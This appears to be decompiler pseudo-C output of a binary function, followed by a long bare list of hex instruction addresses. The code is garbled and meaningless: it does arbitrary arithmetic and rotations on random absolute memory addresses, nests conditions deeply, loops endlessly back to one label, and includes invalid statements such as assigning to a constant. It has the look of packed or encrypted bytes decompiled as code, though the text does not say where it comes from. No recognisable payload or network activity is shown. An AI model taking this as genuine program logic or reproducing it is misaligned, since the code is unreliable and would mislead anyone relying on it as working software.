				 *0x2aa61705 =  *0x2aa61705 & _t116;
				asm("adc ch, 0xb0");
				 *0x7c28398 =  *0x7c28398 | _t90;
				asm("stosb");
				asm("rcr byte [0x9b977630], 0xcb");
				asm("ror dword [0x6116b9f7], 0xac");
				 *0xbdc274cb =  *0xbdc274cb >> 0xf9;
				_pop(_t105);
				_t96 = _t95 |  *0x45de126;
				_push(_t96);
				L1();
				asm("adc bl, 0xa2");
				 *0xadadbbce =  *0xadadbbce << 0x99;
				asm("adc ah, [0x2911072c]");
				asm("sbb [0xf0af8b20], cl");
				_t77 = (((_t71 &  *0x318d9691 ^ 0x964006f5) -  *0xa58f35cc |  *0x43a25ee8) ^ 0xe7c939c5) - 0x2a;
				_push( *0xac221381);
				asm("adc dl, [0x1cef1834]");
				 *0x66063dcb =  *0x66063dcb >> 0xc2;
				 *0xb9307bde =  *0xb9307bde << 0x66;
				_t83 = ( *0xe4fdfc6b * 0x00007148 |  *0x6eefbc08) &  *0xdb03fe7;
				asm("sbb al, [0x6b1d8388]");
				 *0xd3cf10f2 =  *0xd3cf10f2 & _t77;
				asm("sbb ah, 0x22");
				_push(_t96);
				 *0xeec18dfd =  *0xeec18dfd ^ _t77;
				 *0x1aeba99e =  *0x1aeba99e & _t105;
				asm("sbb dh, [0x72576522]");
				asm("sbb esp, [0x8ecfcac2]");
				_t92 = _t90 - 0x00000086 ^  *0x6d72aeba;
				 *0xa56be66f =  *0xa56be66f & _t92;
				_push(_t105);
				asm("rcr dword [0x534da2d], 0x42");
				 *0x5106b8bf =  *0x5106b8bf << 0x74;
				asm("sbb edx, [0x35e0f229]");
				 *0xe4af9d28 =  *0xe4af9d28 - _t92;
				_t78 = _t77 |  *0x87081c14;
				if(_t78 >= 0) {
					__eax =  *0x69968d70;
					asm("sbb esi, [0x3e1b398d]");
					__dh = __dh + 0xd2;
					__esp = __esp |  *0x636202bf;
					__eax =  *0xf215b5dc;
					 *0xf215b5dc =  *0x69968d70;
					if(__esp >= 0) {
						asm("rcl dword [0xdf868670], 0xbf");
						asm("rcl byte [0xddf2ca30], 0x61");
						__esp = __esp |  *0xcd86fb6e;
						_push( *0xdd0e6ebf);
						 *0x575c0cc6 =  *0x575c0cc6 & __cl;
						 *0xbb922939 =  *0xbb922939 - __edx;
						asm("adc edx, [0x261babde]");
						_t21 = __dl;
						__dl =  *0xc640118a;
						 *0xc640118a = _t21;
						asm("adc ah, [0x927b0ae3]");
						 *0x1723ae1b =  *0x1723ae1b + __esp;
						__eax = 0xee2220ff;
						_pop(__ebp);
						__edx = __edx ^ 0x7d19ef13;
						_push(__edi);
						 *0x94089a36 =  *0x94089a36 | 0xee2220ff;
						asm("adc [0x42984de1], ch");
						asm("rcr dword [0x9218cdf4], 0xf5");
						asm("lodsd");
						__ecx = __ecx - 1;
						__bl = __bl & 0x000000a8;
						 *0x6a6b2929 =  *0x6a6b2929 << 0;
						asm("sbb edx, [0x5380ccd6]");
						asm("rcl dword [0x1fa8a42e], 0x16");
						asm("sbb ecx, 0xb126bb2d");
						__ecx =  *0xac1e7660 * 0x50c7;
						 *0x903e9cda =  *0x903e9cda ^ __edx;
						_push(__edx);
						asm("sbb bh, 0x86");
						 *0xe88a8e36 = __esp;
						__dl =  *0xc640118a | 0x000000a0;
						__dh = __dh ^  *0x3ca3b424;
						__esi = __esi ^  *0xbe1d2213;
						asm("movsb");
						__al = __al |  *0xa2467c08;
						asm("rol dword [0x754188c7], 0x44");
						__esi = __esi & 0x00ee11d4;
						asm("adc [0xc4d05135], eax");
						__eax = 0xffffffffee222100;
						asm("adc esp, [0x8f0e5c9c]");
						__esp = __esp - 1;
						asm("rol dword [0xc51213ef], 0xa5");
						 *0xed54673c =  *0xed54673c + __ch;
						 *0x8c6392ef =  *0x8c6392ef >> 0xd;
						__edi = __edi | 0x93b0578c;
						asm("rcr dword [0x56350f0e], 0xef");
						asm("lodsd");
						__eax = 0xffffffffee222100 -  *0xa45893dc;
						 *0xab41b1e4 = __al;
						if(0xee2220ff < 0) {
							asm("adc ecx, [0x98174f79]");
							asm("adc ebp, [0x6310820f]");
							__esi = __esi &  *0x6eeee88c;
							if(( *0xab0c5fd6 & __edx) < 0) {
								_t26 = __edi;
								__edi =  *0x98174f79;
								 *0x98174f79 = _t26;
								 *0xd95ec712 =  *0xd95ec712 + __bl;
								asm("rol dword [0x30181c17], 0x3b");
								asm("adc [0xaa9e5de6], dl");
								_t27 = __edx;
								__edx =  *0x610a85c1;
								 *0x610a85c1 = _t27;
								__ebx = __ebx & 0x171ab68b;
								if(__ebx < 0) {
									__ecx =  *0x80400171;
									_push( *0x497e7e95);
									 *0x44a89583 =  *0x44a89583 ^ __esp;
									 *0xbde24b02 =  *0xbde24b02 & __bh;
									_push(__ecx);
									 *0xf610908a =  *0xf610908a | __bh;
									__esp = __esp &  *0x3f946c6c;
									asm("rcr dword [0x54b1d8f0], 0xe2");
									__edi = 0xa7183efa;
									_t30 = __ah;
									__ah =  *0x141a29e1;
									 *0x141a29e1 = _t30;
									 *0x622fa2fd =  *0x622fa2fd << 0xbc;
									__edx = __ebp;
									 *0x3cf8df66 =  *0x3cf8df66 >> 0x37;
									__edx = __edx &  *0x9de48eeb;
									 *0xf40b42e7 =  *0xf40b42e7 - __ch;
									__esi = __esi -  *0x2a3b1a9d;
									__ebx = __ebx + 1;
									if(__ebx < 0) {
										__eax =  *0x2d80847d * 0xef5;
										__esp = __esp &  *0x462692da;
										 *0x202fe510 =  *0x202fe510 | __cl;
										__edx = __edx + 1;
										__esi = __esi & 0x8989028b;
										asm("adc [0xe8334712], ah");
										__cl = __cl ^ 0x000000b0;
										if(__cl <= 0) {
											__ebp =  *0x3e08bf7f * 0xa718;
											asm("sbb al, 0xe1");
											asm("rcl dword [0x2d101a29], 0xd2");
											asm("rol dword [0xbc40f2c1], 0x4b");
											_t33 = __ecx;
											__ecx =  *0xbd34de9a;
											 *0xbd34de9a = _t33;
											__esi = __esi ^  *0xd288ae64;
											_pop( *0xb1a20d3);
											asm("adc dh, 0xb6");
											__eax = __eax - 1;
											__esp =  *0x2631a860 * 0x9579;
											 *0x12f544b2 =  *0x12f544b2 ^ __bl;
											asm("adc edx, [0x4317e6d3]");
											 *0xdb14c2f8 =  *0xdb14c2f8 >> 0xe0;
											__ebx = __ebx &  *0xc79b5acd;
											 *0xb68b610a =  *0xb68b610a & __dh;
											 *0x7ee01c1a =  *0x7ee01c1a >> 0x67;
											 *0xb7540fe0 =  *0xb7540fe0 >> 0x41;
											 *0x98f86280 =  *0x98f86280 << 0x18;
											asm("sbb ecx, 0x1e077fea");
											__ebp =  *0x3e08bf7f * 0x0000a718 | 0x8aa159a9;
											asm("rcl dword [0x5c37f887], 0xf4");
											if(__ebp != 0) {
												__esi = __esi +  *0xe7dd9674;
												asm("adc esi, 0xc30ef2c4");
												__esp = __esp ^ 0x433963ce;
												__ebp = __ebp +  *0x8989028b;
												__al = 0x8a;
												asm("sbb esi, [0xf1663c11]");
												 *0xf8376618 =  *0xf8376618 | __dl;
												 *0xf10802d4 =  *0xf10802d4 ^ __eax;
												_push(__ebp);
												__ecx = __ecx ^  *0x57ad10ef;
												__ebx = __ebx -  *0x5ec2d9ba;
												asm("ror byte [0x4016e11a], 0x18");
												_push(__eax);
												__dl = __dl &  *0x29e1a718;
												 *0x906a0c1a =  *0x906a0c1a ^ __bh;
												__ebx = __ebx &  *0x958a06dc;
												 *0x32f6b41c =  *0x32f6b41c << 0x4e;
												__ecx =  *0x323212c2;
												asm("rol dword [0xf81ce9c7], 0x87");
												if(__bl > 0x1c) {
													__ebp =  *0x2e7ff07e * 0xbba4;
													__al =  *0x8b610a82;
													 *0x8b610a82 = 0x8a;
													0xb6 = 0x12;
													__ebp =  *0x2e7ff07e * 0xbba4 +  *0xd27cdb0d;
													__eax = __eax -  *0xd5dde1ec;
													__eax = __eax ^ 0x4a324f2f;
													asm("ror dword [0x3d1b18df], 0x4b");
													_push( *0x879670f1);
													asm("sbb bl, 0x84");
													__ebp =  *0x1e09ca6b * 0x37a0;
													asm("sbb [0xb15d1a19], ebx");
													 *0x2cb4a9d =  *0x2cb4a9d | __esi;
													__edi = 0xffffffffef5b7efe;
													__esp = __esp +  *0xe60d8d81;
													__ebp =  *0x1e09ca6b * 0x000037a0 | 0x51663205;
													__esp = __esp | 0x4f058af8;
													asm("rol byte [0x18df4a32], 0x6f");
													__ebp = ( *0x1e09ca6b * 0x000037a0 | 0x51663205) &  *0x6d05f315;
													asm("sbb esp, 0x381b389a");
													 *0x6d542eff =  *0x6d542eff ^ __ebp;
													asm("rol dword [0xd40fbe03], 0xff");
													_pop(__ecx);
													 *0x1457cd15 =  *0x1457cd15 << 0xf;
													asm("adc ebp, [0x8d30980e]");
													asm("ror dword [0xb6afc6c5], 0x39");
													 *0x28b342d =  *0x28b342d ^ __ecx;
													 *0x148a8989 =  *0x148a8989 >> 0x1a;
													__eax = __eax + 1;
													_push( *0x5a6335c0);
													__edi = 0xffffffffef5b7eff;
													_push(0xffffffffef5b7eff);
													asm("sbb dl, [0xdd7fe03c]");
													 *0x1c75c2ec =  *0x1c75c2ec - __ebx;
													asm("adc esi, 0xe79de48e");
													__edx = __edx + 1;
													asm("adc ebp, [0x45c00319]");
													_pop(__edi);
													__esi = __esi + 1;
													__dl =  *0xc293c5f9;
													 *0x6365c3d6 =  *0x6365c3d6 >> 0xe;
													asm("sbb al, 0xe6");
													 *0xa7c4aab5 =  *0xa7c4aab5 | __al;
													if( *0xa7c4aab5 > 0) {
														asm("rcr dword [0xac804776], 0x20");
														asm("sbb edi, [0x1914a817]");
														__dl = __dl | 0x000000d2;
														asm("rcr byte [0x2574491a], 0x2a");
														 *0x3bf0c734 =  *0x3bf0c734 - __dl;
														if( *0x3bf0c734 >= 0) {
															 *0x9de48e14 =  *0x9de48e14 ^ __ah;
															__dl = __dl |  *0xb70e42e7;
															_push(__esi);
															asm("adc esi, [0xcbcf9b8]");
															asm("adc esp, [0x28b86bb]");
															asm("rcr dword [0xc8a8989], 0xb6");
															__edi =  *0x381c9060 * 0x5a7d;
															__esp = __esp ^ 0xfebc64c0;
															 *0x987c10c2 =  *0x987c10c2 & __edx;
															__esp = __esp +  *0x78b4fec8;
															__esp = __esp &  *0x49398ebd;
															asm("rol byte [0xe1a7182c], 0x2c");
															asm("ror dword [0x140d1a29], 0xa7");
															 *0x7a592495 =  *0x7a592495 ^ __ebx;
															__edx = __edx + 0x4fd9fd3f;
															asm("rcr dword [0x37a49c0f], 0x84");
															asm("rol dword [0x1285ac6c], 0x7b");
															__esp = __esp &  *0xab8277cd;
															if(__esp < 0) {
																asm("adc ebx, [0xee551f15]");
																asm("movsw");
																_pop(__ecx);
																 *0x1457cd15 =  *0x1457cd15 ^ __ebp;
																if(__edx >= 0) {
																	_push(0x17d9c72);
																	_push( *0x9dff44f4);
																	__eax = __eax - 0xa0ee16ef;
																	__dl = __dl &  *0x4d8ebd80;
																	__cl = __cl +  *0xca80491a;
																	asm("rcl dword [0x2e3f16c], 0xed");
																	__ebx = 0x26318f35;
																	 *0x1507890a =  *0x1507890a + __bl;
																	__ch =  *0xdfbc4a32;
																	__cl = __cl &  *0x9115c71a;
																	asm("rol byte [0x9a7e2de6], 0xc0");
																	__eax = __eax |  *0xc37e809d;
																	__ecx = __ebp;
																	asm("adc ebp, [0x1457cd15]");
																	__ch =  *0x783e318;
																	 *0x783e318 =  *0xdfbc4a32;
																	__eax = __eax + 1;
																	 *0xcfefd4fe =  *0xcfefd4fe + 0x26318f35;
																	__ecx =  *0x7b61086a * 0x738c;
																	if(__ecx <= 0) {
																		__edx =  *0xd3f7af7f * 0xf641;
																		__dh = __dh & 0x000000f9;
																		asm("sbb [0x13aa519c], esi");
																		__ebx = 0x26318f34;
																		asm("ror byte [0x704716e2], 0xb8");
																		_push(__esi);
																		_push(__esi);
																		__bl = __bl |  *0xce28f0a8;
																		asm("adc [0xb8298a91], ebp");
																		__dh = __dh + 0xe2;
																		asm("adc esi, [0x89140e94]");
																		asm("adc bl, [0x94b29000]");
																		 *0x3690a999 =  *0x3690a999 << 0x50;
																		__esp = __esp - 0x67a214d5;
																		asm("stosd");
																		 *0xf01642e7 =  *0xf01642e7 << 0xe;
																		__edi = __edi ^ 0x568f5a33;
																		__ecx = __ecx + 1;
																		__esi = __ecx;
																		__edi = __edi ^  *0xb58b6029;
																		_push(__ebp);
																		__ecx = __ecx -  *0x5ebd4313;
																		if(__ecx >= 0) {
																			__esp =  *0xb2bf67c * 0x787;
																			asm("adc [0xc859530d], edi");
																			asm("rcr dword [0x4a324fc0], 0x58");
																			 *0x41818df =  *0x41818df ^ __esp;
																			asm("sbb ebp, [0x1f511ef8]");
																			asm("rol dword [0xccf206d1], 0x18");
																			 *0xe71c1003 = __eax;
																			__ebx =  *0xc4836f9b;
																			_t52 = __ecx;
																			__ecx =  *0xf9f62798;
																			 *0xf9f62798 = _t52;
																			 *0x19aa519c =  *0x19aa519c - __ecx;
																			asm("ror byte [0xac6a3108], 0x9b");
																			if( *0x19aa519c >= 0) {
																				 *0x65722670 =  *0x65722670 << 0x90;
																				asm("adc ebp, 0x279d6835");
																				__dh = __dh;
																				__al = __al &  *0xc181ab30;
																				__esp =  *0x80b55169 * 0xb7ac;
																				_push( *0x7d18a817);
																				 *0x950ad381 = __eax;
																				__eax = __eax + 1;
																				 *0x984b758c =  *0x984b758c & __edi;
																				asm("sbb [0x7470e0], bl");
																				__bl = __bl | 0x00000024;
																				asm("ror byte [0x519cf9f6], 0xdb");
																				asm("stosb");
																				asm("ror byte [0xcaa11210], 0xf5");
																				__eax = __eax | 0xcfc0c6d4;
																				__esi =  *0x1a31d565;
																				__ah = __ah + 0x10;
																				__esi =  *0x1a31d565 ^ 0x57eb04d9;
																				asm("movsb");
																				_pop(__esi);
																				 *0x35ae726 =  *0x35ae726 >> 0xd9;
																				__ecx = __ecx + 1;
																				__dl = __dl + 0x18;
																				asm("cmpsw");
																				_t55 = __dh;
																				__dh =  *0x141a29e1;
																				 *0x141a29e1 = _t55;
																				__edi = 0xac73faee;
																				__ch = __ch - 0x34;
																				asm("adc ebx, 0xa3157835");
																				__edi = 0xac73faee -  *0x8cf1ebec;
																				__ebp = __ebp ^  *0xe48eeb13;
																				__ecx = __ecx -  *0x1742e79d;
																				__ebp = __ebp &  *0x6045ccd3;
																				_pop( *0x94b675c7);
																				 *0x8600bc6f =  *0x8600bc6f >> 0x5f;
																				_pop(__ebp);
																				 *0xe5d324a1 =  *0xe5d324a1 -  *0x80b55169 * 0xb7ac;
																				__dl = __dl -  *0x510702c9;
																				asm("rcl byte [0xbb0d908a], 0x30");
																				__edx = __edx ^  *0xe24ebce;
																				 *0x4fd90e02 =  *0x4fd90e02 & 0x000000b6;
																				 *0x18df4a32 =  *0x18df4a32 >> 0x8d;
																				__edx = __edx +  *0xfb78d30f;
																				__dl = __dl + 0x10;
																				__ebp = __ebp -  *0xb2d796cb;
																				__edi = 0xac73faee -  *0x8cf1ebec - 1;
																				asm("sbb edx, [0x70109817]");
																				__esp =  *0x6e341e0b;
																				__edi = 0xac73faee -  *0x8cf1ebec - 1 + 0x1acbdd26;
																				__ecx = __ecx - 1;
																				_push( *0x6e341e0b);
																				__dh =  *0x141a29e1 | 0x00000018;
																				asm("cmpsw");
																				_t58 = __bl;
																				__bl =  *0xceae86e1;
																				 *0xceae86e1 = _t58;
																				 *0x6b7b770e =  *0x6b7b770e & ( *0x1a31d565 ^ 0x57eb04d9);
																				if( *0x6b7b770e >= 0) {
																					__ecx = __ecx -  *0x48118a89;
																					__ebx = __ebx -  *0x9e9263ee;
																					 *0xed01bbbb = __ebx;
																					asm("adc ecx, [0x4489f492]");
																					asm("sbb esi, [0xef559dff]");
																					 *0xfcceba11 = __eax;
																					asm("sbb al, [0xf8aedc22]");
																					__ah = __ah - 0xb2;
																					asm("scasb");
																					__ebp = __ebp - 0xef559dff;
																					asm("adc ebx, [0x7bf67011]");
																					__esp = __esp -  *0x78717e9a;
																					__bh = 0x108;
																					asm("sbb ebx, [0x8ae2a2d8]");
																					__esp = __esp + 1;
																					asm("sbb eax, 0x39127c1d");
																					if( *0xef559dff >= __ebx) {
																						asm("rol dword [0xb15fb672], 0x2c");
																						__edi =  *0xbd9a811d;
																						_t63 = __al;
																						__al =  *0x19ee2c0a;
																						 *0x19ee2c0a = _t63;
																						asm("scasd");
																						 *0xe67f2df2 =  *0xe67f2df2 ^ __dl;
																						asm("sbb ebp, [0xaf12e7fc]");
																						 *0x7edb0e88 =  *0x7edb0e88 << 0xc;
																						__ecx =  *0xbe07e8cf;
																						if( *0x7edb0e88 > 0) {
																							__ebx =  *0xbfb2317e * 0x87e1;
																							if(__ebx > 0) {
																								__edx = __edx &  *0x561d8a76;
																								__al = __al | 0x000000d7;
																								asm("adc eax, [0x4b75a483]");
																								__ecx = __ecx + 1;
																								asm("adc edi, 0x96eebf8c");
																								asm("adc al, 0x30");
																								 *0x1988af12 =  *0x1988af12 ^ __ah;
																								 *0x22f46e38 =  *0x22f46e38 - __cl;
																								__esi = 0x93faa9d;
																								__esp = __esp ^  *0x300ce0bc;
																								 *0x4792d7f9 =  *0x4792d7f9 << 0xf2;
																								asm("adc al, [0x17b7ac80]");
																								 *0x890d14a8 =  *0x890d14a8 >> 0x73;
																								 *0x316220d8 = __esp;
																								__esi =  *0x754a69f0;
																								_t70 = __ebx;
																								__ebx =  *0x790af965;
																								 *0x790af965 = _t70;
																								__esi =  *0x754a69f0 |  *0x9de48e0d;
																								__ch = __ch & 0x000000e7;
																								__edx = __edx + 1;
																								asm("sbb ecx, [0xa8656515]");
																								asm("adc [0x797691df], ebp");
																								__edx =  *0xaaaf1dd;
																								asm("cmpsb");
																								 *0xf3f736b5 =  *0xf3f736b5 | __ah;
																								__ecx = __esp;
																								__esp = __esp ^  *0x1457cd15;
																								__ecx = __ecx ^  *0x1b499ca9;
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				L1:
				 *0x42f27d09 =  *0x42f27d09 & _t78;
				_pop(_t113);
				 *0xa8b2480d =  *0xa8b2480d - _t92;
				 *0xcb78af10 =  *0xcb78af10 | _t83 - 0x00000001;
				_t112 =  *0x59d8e1de;
				 *0x59d8e1de = _t113;
				_t79 = _t78 + 1;
				asm("sbb edx, [0xc234c5dc]");
				asm("adc al, [0x2d236f08]");
				 *0xa00b8c9f = _t109;
				asm("sbb [0xab205d4], esi");
				 *0xd656ff4 =  *0xd656ff4 - _t105;
				_t94 =  *0xbbf37a6a * 0x0000a46f & 0x00000034;
				 *0x11dac03b =  *0xa00b8c9f;
				asm("sbb edx, [0x10308efc]");
				 *0x55f51ae6 = _t79;
				asm("adc edx, 0xc5c0b806");
				 *0xab3eb3e1 =  *0xab3eb3e1 << 0x7b;
				_t78 = _t79 |  *0xe85923c;
				 *0xcbcd0d10 =  *0xcbcd0d10 + _t94;
				_t109 =  *0x11dac03b -  *0x76f78dbd;
				_t101 =  *0x114a19c4;
				 *0xe0f90a1a =  *0xe0f90a1a << 0xcb;
				 *0x977a7cf5 = _t101;
				asm("sbb bl, 0x10");
				 *0x5db083b5 =  *0x5db083b5 >> 0x89;
				_t105 =  *0xc89c2513 - 1 -  *0x5c090605;
				_t102 = _t101 +  *0x9ce3c297;
				asm("adc ah, [0x9c69a888]");
				_t92 = _t94 & 0xfaa20a37;
				_t117 =  *0xdc393f39;
				_t83 =  *0x3aeb780f;
				 *0x3aeb780f = 0x379d699f;
				asm("sbb [0xa46d4c0c], ah");
				asm("movsw");
				if( *0x930ef682 < _t92) {
					_t103 = _t102 +  *0x12982871;
					 *0xde05d010 = _t92;
					 *0xa1360fc6 =  *0xa1360fc6 >> 0x42;
					_t92 = _t92 + 1;
					_t118 = _t117 +  *0x343ab42b;
					asm("cmpsw");
					 *0x5836ae1f =  *0x5836ae1f << 0x21;
					asm("sbb [0x5fe47d30], ah");
					_t114 = _t112 +  *0x9987d86f;
					_push(_t114);
					_t83 =  *0x5f4eba6a * 0xb08d;
					_t78 =  *0x62128164;
					_t112 = _t114 +  *0xbe14c8ef;
					 *0x7eb1d28c =  *0x7eb1d28c & _t118;
					asm("adc [0x896bf326], ecx");
					_t109 = _t109 & 0xc7e434c0;
					if((_t92 & 0x2d837067) >= 0) {
						_t17 = _t83;
						_t83 =  *0xb07b6372;
						 *0xb07b6372 = _t17;
						_t78 = _t78 +  *0x73435a2e;
						_t92 = 0xc;
						_t104 = _t103 +  *0xa897ad0a;
						if(_t104 == 0) {
							 *0x8bf27675 =  *0x8bf27675 + _t105;
							asm("sbb esi, [0xb9b1f4d6]");
							asm("rcr dword [0x41a58989], 0x5");
							_push( *0x41dfbf);
							 *0x66b2930b =  *0x66b2930b | 0x0000000c;
							_push(_t118);
							asm("adc esp, [0x33d91f95]");
							_t112 = _t112 -  *0x789c2168 + 1;
							if(_t112 < 0) {
								asm("rcl dword [0xf0035473], 0x3c");
								asm("rcl byte [0x153c973a], 0xf7");
								asm("sbb [0xd9607493], esp");
								 *0x9256bfd4 =  *0x9256bfd4 ^ _t109;
								if( *0x9256bfd4 >= 0) {
									_push( *0xd70fc778);
									_push(_t118);
									 *0xb1314a0 =  *0xb1314a0 >> 0xba;
									_t112 = _t112 -  *0xcfdb8fc1;
									 *0x16ecee1b =  *0x16ecee1b >> 0xf0;
									if(_t112 < 0) {
										 *0x50c82171 =  *0x50c82171 ^ _t105;
										_push(_t104);
										_t92 = 0x1e;
										_t83 = _t83 -  *0x707b0687;
									}
								}
							}
						}
					}
				}
				goto L1;
			}

0x0041bb8c
0x0041bba2
0x0041bba8
0x0041bbb1
0x0041bbb4
0x0041bbba
0x0041bbbb
0x0041bbc2
0x0041bbc9
0x0041bbd0
0x0041bbd1
0x0041bbd7
0x0041bbd8
0x0041bbe3
0x0041bbe6
0x0041bbed
0x0041bbf3
0x0041bbfe
0x0041bc00
0x0041bc06
0x0041bc0c
0x0041bc26
0x0041bc2d
0x0041bc33
0x0041bc39
0x0041bc3f
0x0041bc42
0x0041bc49
0x0041bc4f
0x0041bc55
0x0041bc5b
0x0041bc67
0x0041bc79
0x0041bc7f
0x0041bc86
0x0041bc8d
0x0041bc94
0x0041bc9a
0x0041bca6
0x0041bcac
0x0041bcb2
0x0041bcb7
0x0041bcbd
0x0041bcc0
0x0041bcc6
0x0041bcc6
0x0041bccc
0x0041bcd2
0x0041bcd9
0x0041bce0
0x0041bce6
0x0041bcec
0x0041bcf2
0x0041bcf8
0x0041bcfe
0x0041bcfe
0x0041bcfe
0x0041bd04
0x0041bd0a
0x0041bd10
0x0041bd15
0x0041bd16
0x0041bd1c
0x0041bd1d
0x0041bd2f
0x0041bd35
0x0041bd3c
0x0041bd3d
0x0041bd3e
0x0041bd41
0x0041bd48
0x0041bd4e
0x0041bd55
0x0041bd5b
0x0041bd65
0x0041bd6b
0x0041bd6c
0x0041bd6f
0x0041bd75
0x0041bd78
0x0041bd7e
0x0041bd84
0x0041bd85
0x0041bd8b
0x0041bd92
0x0041bd98
0x0041bd9e
0x0041bda5
0x0041bdab
0x0041bdac
0x0041bdb3
0x0041bdbf
0x0041bdc6
0x0041bdcc
0x0041bdd3
0x0041bdd4
0x0041bdda
0x0041bddf
0x0041bde5
0x0041bdeb
0x0041bdf1
0x0041bdfd
0x0041be03
0x0041be03
0x0041be03
0x0041be09
0x0041be0f
0x0041be16
0x0041be1c
0x0041be1c
0x0041be1c
0x0041be22
0x0041be28
0x0041be2e
0x0041be34
0x0041be3a
0x0041be40
0x0041be4c
0x0041be4d
0x0041be53
0x0041be59
0x0041be60
0x0041be65
0x0041be65
0x0041be65
0x0041be6b
0x0041be73
0x0041be74
0x0041be81
0x0041be87
0x0041be8d
0x0041be93
0x0041be94
0x0041be9a
0x0041bea4
0x0041beaa
0x0041beb0
0x0041beb1
0x0041bebd
0x0041bec3
0x0041bec6
0x0041becc
0x0041bed6
0x0041bed8
0x0041bedf
0x0041bee6
0x0041bee6
0x0041bee6
0x0041beec
0x0041bef2
0x0041bef8
0x0041befb
0x0041befc
0x0041bf06
0x0041bf0c
0x0041bf12
0x0041bf19
0x0041bf22
0x0041bf28
0x0041bf2f
0x0041bf36
0x0041bf3d
0x0041bf43
0x0041bf49
0x0041bf50
0x0041bf56
0x0041bf5c
0x0041bf68
0x0041bf6e
0x0041bf74
0x0041bf76
0x0041bf7c
0x0041bf82
0x0041bf8e
0x0041bf8f
0x0041bf95
0x0041bf9b
0x0041bfa2
0x0041bfa3
0x0041bfa9
0x0041bfaf
0x0041bfb5
0x0041bfbf
0x0041bfc5
0x0041bfcc
0x0041bfd2
0x0041bfdc
0x0041bfdc
0x0041bfe4
0x0041bfe7
0x0041bfed
0x0041bff3
0x0041bff8
0x0041bfff
0x0041c005
0x0041c009
0x0041c013
0x0041c019
0x0041c01f
0x0041c025
0x0041c02b
0x0041c031
0x0041c037
0x0041c03e
0x0041c044
0x0041c04a
0x0041c050
0x0041c059
0x0041c05a
0x0041c061
0x0041c067
0x0041c06e
0x0041c074
0x0041c07b
0x0041c07c
0x0041c082
0x0041c083
0x0041c084
0x0041c08a
0x0041c090
0x0041c096
0x0041c097
0x0041c09d
0x0041c09e
0x0041c09f
0x0041c0a5
0x0041c0ac
0x0041c0ae
0x0041c0b4
0x0041c0ba
0x0041c0c4
0x0041c0ca
0x0041c0cd
0x0041c0d4
0x0041c0da
0x0041c0e6
0x0041c0ec
0x0041c0f2
0x0041c0f6
0x0041c0fc
0x0041c102
0x0041c109
0x0041c113
0x0041c11b
0x0041c121
0x0041c127
0x0041c12d
0x0041c134
0x0041c13b
0x0041c141
0x0041c14d
0x0041c154
0x0041c15b
0x0041c161
0x0041c16d
0x0041c179
0x0041c187
0x0041c188
0x0041c194
0x0041c19a
0x0041c1a5
0x0041c1ac
0x0041c1b4
0x0041c1ba
0x0041c1c0
0x0041c1c7
0x0041c1cd
0x0041c1d3
0x0041c1d9
0x0041c1df
0x0041c1e6
0x0041c1ec
0x0041c1ed
0x0041c1f3
0x0041c1f3
0x0041c1f9
0x0041c1fa
0x0041c200
0x0041c20a
0x0041c210
0x0041c21a
0x0041c21d
0x0041c223
0x0041c224
0x0041c22b
0x0041c22c
0x0041c22e
0x0041c234
0x0041c23a
0x0041c23d
0x0041c243
0x0041c249
0x0041c250
0x0041c256
0x0041c25d
0x0041c264
0x0041c26a
0x0041c26b
0x0041c26c
0x0041c272
0x0041c273
0x0041c279
0x0041c27f
0x0041c289
0x0041c295
0x0041c29c
0x0041c2a2
0x0041c2a8
0x0041c2af
0x0041c2b4
0x0041c2ba
0x0041c2ba
0x0041c2ba
0x0041c2c0
0x0041c2c6
0x0041c2cd
0x0041c2d3
0x0041c2da
0x0041c2e0
0x0041c2e3
0x0041c2e9
0x0041c2f3
0x0041c2f9
0x0041c2fe
0x0041c2ff
0x0041c305
0x0041c311
0x0041c314
0x0041c31b
0x0041c31c
0x0041c323
0x0041c32f
0x0041c335
0x0041c338
0x0041c33e
0x0041c33f
0x0041c340
0x0041c347
0x0041c348
0x0041c34b
0x0041c34d
0x0041c34d
0x0041c34d
0x0041c353
0x0041c359
0x0041c35c
0x0041c362
0x0041c368
0x0041c36e
0x0041c374
0x0041c37a
0x0041c380
0x0041c387
0x0041c388
0x0041c38e
0x0041c394
0x0041c39b
0x0041c3a1
0x0041c3a7
0x0041c3ae
0x0041c3b4
0x0041c3b7
0x0041c3c3
0x0041c3c4
0x0041c3ca
0x0041c3d0
0x0041c3d6
0x0041c3d7
0x0041c3d8
0x0041c3db
0x0041c3e3
0x0041c3e3
0x0041c3e3
0x0041c3e9
0x0041c3ef
0x0041c3fa
0x0041c400
0x0041c406
0x0041c40c
0x0041c412
0x0041c418
0x0041c41d
0x0041c423
0x0041c426
0x0041c42d
0x0041c433
0x0041c439
0x0041c43f
0x0041c442
0x0041c448
0x0041c44f
0x0041c454
0x0041c45a
0x0041c461
0x0041c46d
0x0041c46d
0x0041c46d
0x0041c473
0x0041c474
0x0041c47a
0x0041c480
0x0041c487
0x0041c48d
0x0041c493
0x0041c49d
0x0041c4a3
0x0041c4a9
0x0041c4ac
0x0041c4b2
0x0041c4b3
0x0041c4c5
0x0041c4ce
0x0041c4d4
0x0041c4da
0x0041c4df
0x0041c4eb
0x0041c4f2
0x0041c4f8
0x0041c4ff
0x0041c505
0x0041c50b
0x0041c50b
0x0041c50b
0x0041c511
0x0041c517
0x0041c51a
0x0041c51b
0x0041c521
0x0041c527
0x0041c52d
0x0041c52e
0x0041c534
0x0041c535
0x0041c541
0x0041c541
0x0041c49d
0x0041c48d
0x0041c454
0x0041c3ef
0x0041c2cd
0x0041c279
0x0041c20a
0x0041c194
0x0041c161
0x0041c0da
0x0041c0b4
0x0041bfcc
0x0041bf50
0x0041bec6
0x0041be94
0x0041be28
0x0041bdfd
0x0041bddf
0x0041bccc
0x0041b4a6
0x0041b4a6
0x0041b4b3
0x0041b4b4
0x0041b4ba
0x0041b4c0
0x0041b4c0
0x0041b4d6
0x0041b4d7
0x0041b4dd
0x0041b4e3
0x0041b4e9
0x0041b4ef
0x0041b4f5
0x0041b4f8
0x0041b4fe
0x0041b510
0x0041b516
0x0041b51c
0x0041b523
0x0041b529
0x0041b535
0x0041b53b
0x0041b541
0x0041b548
0x0041b54e
0x0041b55e
0x0041b565
0x0041b571
0x0041b577
0x0041b57d
0x0041b583
0x0041b58f
0x0041b58f
0x0041b59b
0x0041b5a1
0x0041b5a3
0x0041b5a9
0x0041b5b5
0x0041b5bb
0x0041b5c2
0x0041b5cc
0x0041b5d2
0x0041b5d4
0x0041b5db
0x0041b5e1
0x0041b5ed
0x0041b5ee
0x0041b5f8
